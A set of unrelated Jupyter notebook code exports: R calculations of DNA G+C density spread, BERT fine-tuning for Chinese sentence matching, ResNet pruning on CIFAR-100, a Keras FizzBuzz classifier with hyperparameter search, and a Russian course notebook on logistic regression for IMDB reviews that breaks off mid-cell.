} #GC2MW = function(x){ x*GC + (1-x)*AT } M.dry = sapply(GC, GC2MW.dry) GC2MW.dryCS = function(n){ #n = number of bases #base pair = 665 daltons #base pair per dry cesium DNA = 665 * 4/3 ~= 882 return(n * 882) } M.dryCS = sapply(lens, GC2MW.dryCS) # BD GC2BD = function(x){ (x * 0.098) + 1.66 } rho = sapply(GC, GC2BD) # sd calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){ R = 8.3145e7 x = (100 / 0.098)^2 * ((p*R*T)/(B^2*G*L*M)) return(sqrt(x)) } # run p=seq(1.7, 1.75, 0.01) L=seq(500, 50000, 500) m = outer(p, L, calc_s.d) rownames(m) = p colnames(m) = L %%R heatmap(m, Rowv=NA, Colv=NA) %%R -w 500 -h 350 df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)), 'GC_sd'=m[1,])) #df$GC_sd = sqrt(df$GC_var) ggplot(df, aes(fragment_length, GC_sd)) + geom_line() + geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) + labs(x='fragment length (bp)', y='G+C s.d.') + theme( text = element_text(size=16) ) ``` __Notes:__ * Small fragment size (<4000 bp) leads to large standard deviations in realized G+C ``` %%R calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){ R = 8.3145e7 sigma_sq = (p*R*T)/(B^2*G*L*M) return(sqrt(sigma_sq)) } # run p=seq(1.7, 1.75, 0.01) L=seq(500, 50000, 500) m = outer(p, L, calc_s.d) rownames(m) = p colnames(m) = L head(m) %%R heatmap(m, Rowv=NA, Colv=NA) %%R -w 500 -h 350 BD50 = 0.098 * 0.5 + 1.66 df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)), 'BD_sd'=m[BD50,])) ggplot(df, aes(fragment_length, BD_sd)) + geom_line() + geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) + labs(x='fragment length (bp)', y='G+C s.d.') + theme( text = element_text(size=16) ) ```
github_jupyter
``` from google.colab import drive drive.mount('/content/gdrive') import os os.chdir('/content/gdrive/My Drive/finch/tensorflow2/text_matching/joint/main') %tensorflow_version 2.x !pip install transformers from transformers import BertTokenizer, TFBertModel from sklearn.metrics import classification_report import tensorflow as tf import tensorflow_addons as tfa import numpy as np import pprint import logging import time import math import json import csv print("TensorFlow Version", tf.__version__) print('GPU Enabled:', tf.test.is_gpu_available()) params = { 'pretrain_path': 'bert-base-chinese', 'train_path': '../data/train.json', 'test_path': '../data/dev.json', 'batch_size': 32, 'max_len': 128, 'buffer_size': 34334 + 100000, 'init_lr': 1e-5, 'max_lr': 3e-5, 'n_epochs': 12, 'clip_norm': 5., 'label_smooth': .0, 'num_patience': 7, } tokenizer = BertTokenizer.from_pretrained(params['pretrain_path'], lowercase = True, add_special_tokens = True) def get_vocab(f_path): k2v = {} with open(f_path) as f: for i, line in enumerate(f): line = line.rstrip() k2v[line] = i return k2v def data_gen_cs(): f_path = '../data/test.csv' with open(f_path) as f: print('Reading', f_path) for i, line in enumerate(csv.reader(f, delimiter=',')): if i == 0: continue text1, text2, label = line if len(text1) + len(text2) + 3 > params['max_len']: _max_len = (params['max_len'] - 3) // 2 text1 = text1[:_max_len] text2 = text2[:_max_len] text1 = list(text1) text2 = list(text2) text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]'] seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1] text = tokenizer.convert_tokens_to_ids(text) yield ((text, seg), int(label)) def data_gen_js(): f_path = '../data/dev.json' with open(f_path) as f: print('Reading', f_path) for line in f: line = json.loads(line.rstrip()) text1, text2, label = line['sentence1'], line['sentence2'], line['label'] if len(text1) + len(text2) + 3 > params['max_len']: _max_len = (params['max_len'] - 3) // 2 text1 = text1[:_max_len] text2 = text2[:_max_len] text1 = list(text1) text2 = list(text2) text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]'] seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1] text = tokenizer.convert_tokens_to_ids(text) yield ((text, seg), int(label)) def joint_data_gen(): f_path = '../data/train.csv' with open(f_path) as f: print('Reading', f_path) for i, line in enumerate(csv.reader(f, delimiter=',')): if i == 0: continue text1, text2, label = line if len(text1) + len(text2) + 3 > params['max_len']: _max_len = (params['max_len'] - 3) // 2 text1 = text1[:_max_len] text2 = text2[:_max_len] text1 = list(text1) text2 = list(text2) text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]'] seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1] text = tokenizer.convert_tokens_to_ids(text) yield ((text, seg), int(label)) f_path = '../data/train.json' with open(f_path) as f: print('Reading', f_path) for line in f: line = json.loads(line.rstrip()) text1, text2, label = line['sentence1'], line['sentence2'], line['label'] if len(text1) + len(text2) + 3 > params['max_len']: _max_len = (params['max_len'] - 3) // 2 text1 = text1[:_max_len] text2 = text2[:_max_len] text1 = list(text1) text2 = list(text2) text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]'] seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1] text = tokenizer.convert_tokens_to_ids(text) yield ((text, seg), int(label)) def get_datasets(params): _shapes = (([None], [None]), ()) _types = ((tf.int32, tf.int32), tf.int32) _pads = ((0, 0), -1) ds_train = tf.data.Dataset.from_generator( lambda: joint_data_gen(), output_shapes = _shapes, output_types = _types,) ds_train = ds_train.shuffle(params['buffer_size']) ds_train = ds_train.padded_batch(params['batch_size'], _shapes, _pads) ds_train = ds_train.prefetch(tf.data.experimental.AUTOTUNE) ds_test_js = tf.data.Dataset.from_generator( lambda: data_gen_js(), output_shapes = _shapes, output_types = _types,) ds_test_js = ds_test_js.padded_batch(params['batch_size'], _shapes, _pads) ds_test_js = ds_test_js.prefetch(tf.data.experimental.AUTOTUNE) ds_test_cs = tf.data.Dataset.from_generator( lambda: data_gen_cs(), output_shapes = _shapes, output_types = _types,) ds_test_cs = ds_test_cs.padded_batch(params['batch_size'], _shapes, _pads) ds_test_cs = ds_test_cs.prefetch(tf.data.experimental.AUTOTUNE) return ds_train, ds_test_js, ds_test_cs # input stream ids check (text, seg), _ = next(joint_data_gen()) print(text) print(seg) class BertFinetune(tf.keras.Model): def __init__(self, params): super(BertFinetune, self).__init__() self.bert = TFBertModel.from_pretrained(params['pretrain_path'], trainable = True) self.bert.load_weights('../model/bert_further_pretrain.h5', by_name = True, skip_mismatch = True) self.drop_1 = tf.keras.layers.Dropout(.1) self.fc = tf.keras.layers.Dense(300, tf.nn.swish, name='down_stream/fc') self.drop_2 = tf.keras.layers.Dropout(.1) self.out = tf.keras.layers.Dense(1, name='down_stream/out') def call(self, bert_inputs, training): bert_inputs = [tf.cast(inp, tf.int32) for inp in bert_inputs] x = self.bert(bert_inputs, training=training) x = x[1] x = self.drop_1(x, training=training) x = self.fc(x) x = self.drop_2(x, training=training) x = self.out(x) x = tf.squeeze(x, 1) return x model = BertFinetune(params) model.build([[None, None], [None, None], [None, None]]) print(model.weights[5]) def label_smoothing(label, smooth): if smooth > 0.: return label * (1 - smooth) + 0.5 * smooth else: return label decay_lr = tfa.optimizers.Triangular2CyclicalLearningRate( initial_learning_rate = params['init_lr'], maximal_learning_rate = params['max_lr'], step_size = 2 * params['buffer_size'] // params['batch_size'],) optim = tf.optimizers.Adam(params['init_lr']) global_step = 0 best_acc, best_acc1, best_acc2 = .0, .0, .0 count = 0 t0 = time.time() logger = logging.getLogger('tensorflow') logger.setLevel(logging.INFO) for _ in range(params['n_epochs']): ds_train, ds_test_js, ds_test_cs = get_datasets(params) # TRAINING for ((text, seg), labels) in ds_train: with tf.GradientTape() as tape: logits = model([text, tf.sign(text), seg], training=True) labels = tf.cast(labels, tf.float32) num_neg = tf.reduce_sum(tf.cast(tf.equal(labels, 0.), tf.float32)).numpy() num_pos = tf.reduce_sum(labels).numpy() if num_pos == 0.: pos_weight = 1. else: pos_weight = num_neg / num_pos loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits( labels = label_smoothing(labels, params['label_smooth']), logits = logits, pos_weight = pos_weight)) optim.lr.assign(decay_lr(global_step)) grads = tape.gradient(loss, model.trainable_variables) grads, _ = tf.clip_by_global_norm(grads, params['clip_norm']) optim.apply_gradients(zip(grads, model.trainable_variables)) if global_step % 100 == 0: logger.info("Step {} | Loss: {:.4f} | Spent: {:.1f} secs | LR: {:.6f}".format( global_step, loss.numpy().item(), time.time()-t0, optim.lr.numpy().item())) t0 = time.time() global_step += 1 # EVALUATION 1 m = tf.keras.metrics.Accuracy() intent_true = [] intent_pred = [] for ((text, seg), labels) in ds_test_cs: logits = tf.sigmoid(model([text, tf.sign(text), seg], training=False)) y_pred = tf.cast(tf.math.greater_equal(logits, .5), tf.int32) m.update_state(y_true=labels, y_pred=y_pred) intent_true += labels.numpy().flatten().tolist() intent_pred += y_pred.numpy().flatten().tolist() acc_1 = m.result().numpy() logger.info('测试集:微众银行智能客服') logger.info("Evaluation: Testing Accuracy: {:.3f}".format(acc_1)) logger.info('\n'+classification_report(y_true = intent_true, y_pred = intent_pred, labels = [0, 1], target_names = ['Not Matched', 'Matched'], digits = 3)) # EVALUATION 2 m = tf.keras.metrics.Accuracy() intent_true = [] intent_pred = [] for ((text, seg), labels) in ds_test_js: logits = tf.sigmoid(model([text, tf.sign(text), seg], training=False)) y_pred = tf.cast(tf.math.greater_equal(logits, .5), tf.int32) m.update_state(y_true=labels, y_pred=y_pred) intent_true += labels.numpy().flatten().tolist() intent_pred += y_pred.numpy().flatten().tolist() acc_2 = m.result().numpy() logger.info('测试集:蚂蚁金融语义相似度') logger.info("Evaluation: Testing Accuracy: {:.3f}".format(acc_2)) logger.info('\n'+classification_report(y_true = intent_true, y_pred = intent_pred, labels = [0, 1], target_names = ['Not Matched', 'Matched'], digits = 3)) # Define Where To Save Model and Stop Training acc = (acc_1 + acc_2) / 2. if acc > best_acc: best_acc = acc best_acc1 = acc_1 best_acc2 = acc_2 # you can save model here count = 0 else: count += 1 logger.info("Best | Accuracy 1: {:.3f} | Accuracy 2: {:.3f}".format(best_acc1, best_acc2)) if count == params['num_patience']: print(params['num_patience'], "times not improve the best result, therefore stop training") break ```
github_jupyter
``` from pytorchcv.model_provider import get_model as ptcv_get_model import torch import torch.nn.utils.prune as prune import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') net = ptcv_get_model("resnet20_cifar100", pretrained=True) net = net.to(device) import torchvision import torchvision.transforms as transforms transform = transforms.Compose( [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]) trainset = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=20, shuffle=True, num_workers=2) testset = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform) testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False, num_workers=2) classes = ("beaver", "dolphin", "otter", "seal", "whale", "aquarium fish", "flatfish", "ray", "shark", "trout", "orchids", \ "poppies", "roses", "sunflowers", "tulips", "bottles", "bowls", "cans", "cups", "plates", "apples", "mushrooms", \ "oranges", "pears", "sweet peppers", "clock", "computer keyboard", "lamp", "telephone", "television", "bed", \ "chair", "couch", "table", "wardrobe", "bee", "beetle", "butterfly", "caterpillar", "cockroach", "bear", "leopard", \ "lion", "tiger", "wolf", "bridge", "castle", "house", "road", "skyscraper", "cloud", "forest", "mountain", "plain", "sea", \ "camel", "cattle", "chimpanzee", "elephant", "kangaroo", "fox", "porcupine", "possum", "raccoon", "skunk", "crab", \ "lobster", "snail", "spider", "worm", "baby", "boy", "girl", "man", "woman", "crocodile", "dinosaur", "lizard", "snake",\ "turtle", "hamster", "mouse", "rabbit", "shrew", "squirrel", "maple", "oak", "palm", "pine", "willow", "bicycle", "bus",\ "motorcycle", "pickup truck", "train", "lawn-mower", "rocket", "streetcar", "tank", "tractor") import matplotlib.pyplot as plt import numpy as np # functions to show an image def imshow(img): img = img / 2 + 0.5 # unnormalize npimg = img.numpy() plt.imshow(np.transpose(npimg, (1, 2, 0))) plt.show() # get some random training images dataiter = iter(trainloader) images, labels = dataiter.next() # show images imshow(torchvision.utils.make_grid(images)) # print labels print(' '.join('%5s' % classes[labels[j]] for j in range(4))) parameters_to_prune = ( (net.features.init_block.conv, "weight"), (net.features.stage1.unit1.body.conv1.conv, "weight"), (net.features.stage1.unit1.body.conv2.conv, "weight"), (net.features.stage1.unit2.body.conv1.conv, "weight"), (net.features.stage1.unit2.body.conv2.conv, "weight"), (net.features.stage1.unit3.body.conv1.conv, "weight"), (net.features.stage1.unit3.body.conv2.conv, "weight"), (net.features.stage2.unit1.body.conv1.conv, "weight"), (net.features.stage2.unit1.body.conv2.conv, "weight"), (net.features.stage2.unit1.identity_conv.conv, "weight"), (net.features.stage2.unit2.body.conv1.conv, "weight"), (net.features.stage2.unit2.body.conv2.conv, "weight"), (net.features.stage2.unit3.body.conv1.conv, "weight"), (net.features.stage2.unit3.body.conv2.conv, "weight"), (net.features.stage3.unit1.body.conv1.conv, "weight"), (net.features.stage3.unit1.body.conv2.conv, "weight"), (net.features.stage3.unit1.identity_conv.conv, "weight"), (net.features.stage3.unit2.body.conv1.conv, "weight"), (net.features.stage3.unit2.body.conv2.conv, "weight"), (net.features.stage3.unit3.body.conv1.conv, "weight"), (net.features.stage3.unit3.body.conv2.conv, "weight"), (net.output, "weight") ) import torch.optim as optim criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.8, weight_decay=1e-4) def test(): correct = 0 total = 0 with torch.no_grad(): for i, data in enumerate(testloader, 0): if i > 25: break images, labels = data[0].to(device), data[1].to(device) outputs = net(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() print('Accuracy of the network on 100 test images: %d %%' % ( 100 * correct / total)) n_prune = 10 for p in range(n_prune): test() print("prune") prune.global_unstructured( parameters_to_prune, pruning_method=prune.L1Unstructured, amount=0.2, ) test() for i, data in enumerate(trainloader, 0): # get the inputs; data is a list of [inputs, labels] inputs, labels = data[0].to(device), data[1].to(device) # zero the parameter gradients optimizer.zero_grad() # forward + backward + optimize outputs = net(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() # print statistics if i % 500 == 0: test() optimizer = optim.SGD(net.parameters(), lr=0.0005) n_epoch = 5 for p in range(n_epoch): for i, data in enumerate(trainloader, 0): # get the inputs; data is a list of [inputs, labels] inputs, labels = data[0].to(device), data[1].to(device) # zero the parameter gradients optimizer.zero_grad() # forward + backward + optimize outputs = net(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() # print statistics if i % 500 == 0: test() if True: correct = 0 total = 0 with torch.no_grad(): for i, data in enumerate(testloader, 0): images, labels = data[0].to(device), data[1].to(device) outputs = net(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() print('Accuracy of the network on 10000 test images: %d %%' % ( 100 * correct / total)) for (p, _) in parameters_to_prune: print(torch.sum(p.weight_mask).item(), " / ", torch.sum(1*p.weight_mask >= 0).item()) ```
github_jupyter
### requirements / ToDo [x] train/test accuracy total + Fizz/Buzz/FizzBuzz separately [x] graphs for different hyperparameter options (do graphs) [x] try different learning algorithms [ ] include best setting in report [x] add main.py that creates output.csv ## Logic Based FizzBuzz Function [Software 1.0] ``` !pip install tqdm hyperopt import numpy as np import pandas as pd import matplotlib.pyplot as plt from tensorflow import set_random_seed %matplotlib inline set_random_seed(574) np.random.seed(574) def fizzbuzz(n): # Logic Explanation if n % 3 == 0 and n % 5 == 0: return 'fizzbuzz' elif n % 3 == 0: return 'fizz' elif n % 5 == 0: return 'buzz' else: return 'other' ``` ## Create Training and Testing Datasets in CSV Format ``` def createInputCSV(start,end,filename): # Why list in Python? inputData = [] outputData = [] # Why do we need training Data? for i in range(start,end): inputData.append(i) outputData.append(fizzbuzz(i)) # Why Dataframe? dataset = {} dataset["input"] = inputData dataset["label"] = outputData # Writing to csv pd.DataFrame(dataset).to_csv(filename, index=False) print(filename, "Created!") ``` ## Processing Input and Label Data ``` def processData(dataset): # Why do we have to process? data = dataset['input'].values labels = dataset['label'].values processedData = encodeData(data) processedLabel = encodeLabel(labels) return processedData, processedLabel def encodeData(data): processedData = [] for dataInstance in data: # Why do we have number 10? # to encode digits from 1 to 1000 processedData.append([dataInstance >> d & 1 for d in range(10)]) return np.array(processedData) from keras.utils import np_utils def encodeLabel(labels): processedLabel = [] for labelInstance in labels: if(labelInstance == "fizzbuzz"): # Fizzbuzz processedLabel.append([3]) elif(labelInstance == "fizz"): # Fizz processedLabel.append([1]) elif(labelInstance == "buzz"): # Buzz processedLabel.append([2]) else: # Other processedLabel.append([0]) return np_utils.to_categorical(np.array(processedLabel),4) ``` ## Model Definition ``` from keras.models import Sequential from keras.layers import Dense, Activation, Dropout from keras.callbacks import EarlyStopping from keras.optimizers import RMSprop, SGD, Adam, Nadam optimizers = { 'SGD': SGD, 'RMSprop': RMSprop, 'Adam': Adam, 'Nadam': Nadam } input_size = 10 output_size = 4 def get_model(params, verbose=False, optim_algo='RMSprop'): # Why do we need a model? # For it to learn the mapping from input to output # Why use Dense layer and then activation? # Dense layers contain the model coeficients that perform linear transformations on the input data # Activations are needed to introduce nonliniarities (composition of multiple linear transformation is just another linear transformation) # Why use sequential model with layers? # Because there is no need to use functional API as we have a linear computation graph assert len(params['hidden_layer_nodes']) == params['num_hidden'], "specify layer size for each hidden layer" model = Sequential() model.add(Dense(params['hidden_layer_nodes'][0], input_dim=input_size)) model.add(Activation(params['activation'])) # Why dropout? # to avoid overfitting (avoiding nodes that don't compute anything useful) model.add(Dropout(params['drop_out'])) for i in range(1,params['num_hidden']): model.add(Dense(params['hidden_layer_nodes'][i])) model.add(Activation(params['activation'])) model.add(Dropout(params['drop_out'])) model.add(Dense(output_size)) model.add(Activation('softmax')) # Why Softmax? # to get probabilistic output if verbose: model.summary() # Why use categorical_crossentropy? # because it's differentiable generalization of logloss that works for n-dimensional probabilistic outputs optimizer = optimizers[optim_algo](lr = params['learning_rate']) model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy']) return model ``` # <font color='blue'>Creating Training and Testing Datafiles</font> ``` # Create datafiles createInputCSV(101,1001,'training.csv') createInputCSV(1,101,'testing.csv') ``` # <font color='blue'>Creating Model</font> ``` hyper_params = { 'drop_out': 0.339, 'hidden_layer_nodes': [245, 154, 67], 'num_hidden': 3, 'activation': 'selu', 'learning_rate': 0.00815 } model = get_model(hyper_params, optim_algo='SGD') ``` # <font color = blue>Run Model</font> ``` validation_data_split = 0.2 num_epochs = 1000 model_batch_size = 128 early_patience = 100 earlystopping_cb = EarlyStopping(monitor='val_loss', verbose=0, patience=early_patience, mode='min') # Read Dataset dataset = pd.read_csv('training.csv') # Process Dataset processedData, processedLabel = processData(dataset) history = model.fit(processedData , processedLabel , validation_split=validation_data_split , epochs=num_epochs , batch_size=model_batch_size , callbacks = [earlystopping_cb] ) from hyperopt import hp, STATUS_OK, tpe, fmin, Trials from hyperopt.pyll.stochastic import sample from sklearn.metrics import confusion_matrix ITERATION = 0 def hypp_search_objective(hypp): global ITERATION ITERATION += 1 hypp.update(hypp.pop('num_hidden')) hypp['hidden_layer_nodes'] = [int(x) for x in hypp['hidden_layer_nodes']] model = get_model(hypp) history = model.fit(processedData , processedLabel , validation_split = validation_data_split , epochs = num_epochs , batch_size = model_batch_size , callbacks = [earlystopping_cb] , verbose = False ) best_acc = np.max(history.history['val_acc']) train_acc = np.max(history.history['acc']) loss = 1 - best_acc return {'loss': loss, 'best_acc': best_acc, 'train_acc': train_acc, 'params': hypp, 'iteration': ITERATION, 'status': STATUS_OK} def class_accuracy(pred_score, y_true): CM = confusion_matrix( np.argmax(y_true,axis=1), np.argmax(pred_score,axis=1) ) return np.diagonal(CM / CM.sum(axis=1)) def model_test(model,data): hist = model.fit(data['X_tr'], data['y_tr'], validation_split = 0.2, epochs = num_epochs, batch_size = model_batch_size, callbacks = [earlystopping_cb], verbose = False) pred_train = model.predict(data['X_tr']) pred_test = model.predict(data['X_ts']) return { 'train': class_accuracy(data['y_tr'], pred_train), 'test': class_accuracy(data['y_ts'], pred_test), 'hist': hist } ``` ### domain space ``` space = { 'activation': hp.choice('activation', ['tanh', 'relu', 'elu', 'selu']), 'num_hidden': hp.choice('num_hidden', [{'num_hidden': 1, 'hidden_layer_nodes': [hp.qnormal('hidden_11_size', 256, 10, 1)]}, {'num_hidden': 2, 'hidden_layer_nodes': [hp.qnormal('hidden_12_size', 256, 10, 1), hp.qnormal('hidden_22_size', 128, 10, 1)]}, {'num_hidden': 3, 'hidden_layer_nodes': [hp.qnormal('hidden_13_size', 256, 10, 1), hp.qnormal('hidden_23_size', 128, 10, 1), hp.qnormal('hidden_2_size', 64, 5, 1)]}]), 'drop_out': hp.uniform('drop_out', 0.0, 0.9), 'learning_rate': hp.loguniform('learning_rate', np.log(0.001), np.log(0.1)) #more frequent sampling for smaller values } bayes_trials = Trials() best = fmin(fn = hypp_search_objective, space = space, algo = tpe.suggest, max_evals = 5, trials = bayes_trials, rstate = np.random.RandomState(573)) max(bayes_trials.trials, key=lambda x: x['result']['best_acc']) ``` ### using Google Colaboratory found that ``` { 'drop_out': 0.339, 'hidden_layer_nodes': [245, 154, 67], 'num_hidden': 3, 'activation': 'tanh', 'learning_rate': 0.00815 }``` is the best option ### how train and test scores depend on Dropout and learning algorithm ``` params = { 'hidden_layer_nodes': [245, 154, 67], 'num_hidden': 3, 'activation': 'tanh', 'learning_rate': 0.00815, 'drop_out': 0.339 } data_train = pd.read_csv('./training.csv') data_test = pd.read_csv('./testing.csv') X_tr, y_tr = processData(data_train) X_ts, y_ts = processData(data_test) data = { 'X_tr': X_tr, 'X_ts': X_ts, 'y_tr': y_tr, 'y_ts': y_ts } model = get_model(params) model.save_weights('./init_weights.hdf5') from tqdm import tqdm_notebook as tqdm dropout_test = [] params_wo_dropout = params.copy() del params_wo_dropout['drop_out'] for dropout in tqdm(np.linspace(0,0.9,num=20)): model = get_model(dict({'drop_out': dropout}, **params_wo_dropout)) model.load_weights('./init_weights.hdf5') dropout_test.append( model_test(model, data) ) dropout_test = { 'test': np.r_[[x['test'] for x in dropout_test]], 'train': np.r_[[x['train'] for x in dropout_test]] } cols = ['other', 'fizz', 'buzz', 'fizzbuzz'] index = np.linspace(0,1,20) do_train = pd.DataFrame(dropout_test['train'],columns=cols, index=index).fillna(0) do_test = pd.DataFrame(dropout_test['test'],columns=cols, index=index).fillna(0) f,ax = plt.subplots(1,4,figsize=(15,3)) for i,c in enumerate(cols): ax[i].set_title(c) do_train[c].plot(label='train', ax=ax[i]) do_test[c].plot(label='test', ax=ax[i]) ax[i].legend() algo_test = [] for algo in tqdm(['SGD','RMSprop','Adam','Nadam']): model = get_model(params, optim_algo=algo) model.load_weights('./init_weights.hdf5') algo_test.append( model_test(model, data) ) algo_test = { 'test': np.r_[[x['test'] for x in algo_test]], 'train': np.r_[[x['train'] for x in algo_test]], 'epochs_train': np.r_[[len(x['hist'].history['acc']) for x in algo_test]] } cols = ['other', 'fizz', 'buzz', 'fizzbuzz'] index = ['SGD','RMSprop','Adam','Nadam'] algo_train = pd.DataFrame(algo_test['train'],columns=cols, index=index).fillna(0) algo_train['n_epochs'] = algo_test['epochs_train'] algo_test = pd.DataFrame(algo_test['test'],columns=cols, index=index).fillna(0) algo_test.columns = [x+'_test' for x in algo_test.columns] algo_train.drop('n_epochs',axis=1).mean(axis=1) algo_test.mean(axis=1) pd.concat([algo_test,algo_train],axis=1) ``` ### testing lower learning rate for SGD ``` params params_lr = params.copy() params_lr['learning_rate'] = 1e-2 model = get_model(params_lr, optim_algo='SGD') model.load_weights('./init_weights.hdf5') res = model_test(model, data) ``` # <font color = blue>Training and Validation Graphs</font> ``` df = pd.DataFrame(history.history) df.plot(subplots=True, grid=True, figsize=(10,15)) ``` # <font color = blue>Testing Accuracy [Software 2.0]</font> ``` def decodeLabel(encodedLabel): if encodedLabel == 0: return "other" elif encodedLabel == 1: return "fizz" elif encodedLabel == 2: return "buzz" elif encodedLabel == 3: return "fizzbuzz" model = get_model(params) model_test(model, data) wrong = 0 right = 0 testData = pd.read_csv('testing.csv') processedTestData = encodeData(testData['input'].values) processedTestLabel = encodeLabel(testData['label'].values) predictedTestLabel = [] for i,j in zip(processedTestData,processedTestLabel): y = model.predict(np.array(i).reshape(-1,10)) predictedTestLabel.append(decodeLabel(y.argmax())) if j.argmax() == y.argmax(): right = right + 1 else: wrong = wrong + 1 print("Errors: " + str(wrong), " Correct :" + str(right)) print("Testing Accuracy: " + str(right/(right+wrong)*100)) output = {} output["input"] = testData['input'] output["label"] = testData['label'] output["predicted_label"] = predictedTestLabel opdf = pd.DataFrame(output) opdf.to_csv('output.csv') ```
github_jupyter
<center> <img src="../../img/ods_stickers.jpg"> ## Открытый курс по машинному обучению </center> Автор материала: программист-исследователь Mail.ru Group, старший преподаватель Факультета Компьютерных Наук ВШЭ Юрий Кашницкий. Материал распространяется на условиях лицензии [Creative Commons CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Можно использовать в любых целях (редактировать, поправлять и брать за основу), кроме коммерческих, но с обязательным упоминанием автора материала. # <center>Тема 4. Линейные модели классификации и регрессии ## <center>Часть 4. Где логистическая регрессия хороша и где не очень ### Анализ отзывов IMDB к фильмам Будем решать задачу бинарной классификации отзывов IMDB к фильмам. Имеется обучающая выборка с размеченными отзывами, по 12500 отзывов известно, что они хорошие, еще про 12500 – что они плохие. Здесь уже не так просто сразу приступить к машинному обучению, потому что готовой матрицы $X$ нет – ее надо приготовить. Будем использовать самый простой подход – мешок слов ("Bag of words"). При таком подходе признаками отзыва будут индикаторы наличия в нем каждого слова из всего корпуса, где корпус – это множество всех отзывов. Идея иллюстрируется картинкой <img src="../../img/bag_of_words.svg" width=80%> ``` from __future__ import division, print_function # отключим всякие предупреждения Anaconda import warnings warnings.filterwarnings('ignore') import numpy as np import matplotlib.pyplot as plt %matplotlib inline import seaborn as sns import numpy as np from sklearn.datasets import load_files from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer from sklearn.linear_model import LogisticRegression from sklearn.svm import LinearSVC ``` **Загрузим данные [отсюда](http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz) (это прямая ссылка на скачивание, а [вот](http://ai.stanford.edu/~amaas/data/sentiment/) описание набора данных). В обучающей и тестовой выборках по 12500 тысяч хороших и плохих отзывов к фильмам.** ``` # поменяйте путь к файлу reviews_train = load_files("/Users/y.kashnitsky/Yandex.Disk.localized/ML/data/aclImdb/train") text_train, y_train = reviews_train.data, reviews_train.target print("Number of documents in training data: %d" % len(text_train)) print(np.bincount(y_train)) # поменяйте путь к файлу reviews_test = load_files("/Users/y.kashnitsky/Yandex.Disk.localized/ML/data/aclImdb/test") text_test, y_test = reviews_test.data, reviews_test.target print("Number of documents in test data: %d" % len(text_test)) print(np.bincount(y_test)) ``` **Пример отзыва и соответствующей метки.** ``` print(text_train[1]) y_train[1] # плохой отзыв text_train[2] y_train[2] # хороший отзыв ``` ## Простой подсчет слов **Составим словарь всех слов с помощью CountVectorizer.** ``` cv = CountVectorizer() cv.fit(text_train) len(cv.vocabulary_) ``` **Посмотрим на примеры полученных "слов" (лучше их называть токенами). Видим, что многие важные этапы обработки текста мы тут пропустили.** ``` print(cv.get_feature_names()[:50]) print(cv.get_feature_names()[50000:50050]) ``` **Закодируем предложения из текстов обучающей выборки индексами входящих слов. Используем разреженный формат.** ``` X_train = cv.transform(text_train) X_train ``` **Посмотрим, как преобразование подействовало на одно из предложений.** ``` print(text_train[19726]) X_train[19726].nonzero()[1] X_train[19726].nonzero() ``` **Преобразуем так же тестовую выборку.** ``` X_test = cv.transform(text_test) ``` **Обучим логистическую регрессию.** ``` %%time logit = LogisticRegression(n_jobs=-1, random_state=7) logit.fit(X_train, y_train) ``` **Посмотрим на доли правильных ответов на обучающей и тестовой выборках.** ``` round(logit.score(X_train, y_train), 3), round(logit.score(X_test, y_test), 3), ``` **Коэффициенты модели можно красиво отобразить.** ``` def visualize_coefficients(classifier, feature_names, n_top_features=25): # get coefficients with large absolute values coef = classifier.coef_.ravel() positive_coefficients = np.argsort(coef)[-n_top_features:] negative_coefficients = np.argsort(coef)[:n_top_features] interesting_coefficients = np.hstack([negative_coefficients, positive_coefficients]) # plot them plt.figure(figsize=(15, 5)) colors = ["red" if c < 0 else "blue" for c in coef[interesting_coefficients]] plt.bar(np.arange(2 * n_top_features), coef[interesting_coefficients], color=colors) feature_names = np.array(feature_names) plt.xticks(np.arange(1, 1 + 2 * n_top_features), feature_names[interesting_coefficients], rotation=60, ha="right"); def plot_grid_scores(grid, param_name): plt.plot(grid.param_grid[param_name], grid.cv_results_['mean_train_score'], color='green', label='train') plt.plot(grid.param_grid[param_name], grid.cv_results_['mean_test_score'], color='red', label='test') plt.legend(); visualize_coefficients(logit, cv.get_feature_names()) ``` **Подберем коэффициент регуляризации для логистической регрессии. Используем `sklearn.pipeline`, поскольку `CountVectorizer` правильно применять только на тех данных, на которых в текущий момент обучается модель (чтоб не "подсматривать" в тестовую выборку и не считать по ней частоты вхождения слов). В данном случае `pipeline` задает последовательность действий: применить `CountVectorizer`, затем обучить логистическую регрессию.** ``` %%time from sklearn.pipeline import make_pipeline text_pipe_logit = make_pipeline(CountVectorizer(), LogisticRegression(n_jobs=-1, random_state=7)) text_pipe_logit.fit(text_train, y_train) print(text_pipe_logit.score(text_test, y_test)) %%time from sklearn.model_selection import GridSearchCV param_grid_logit = 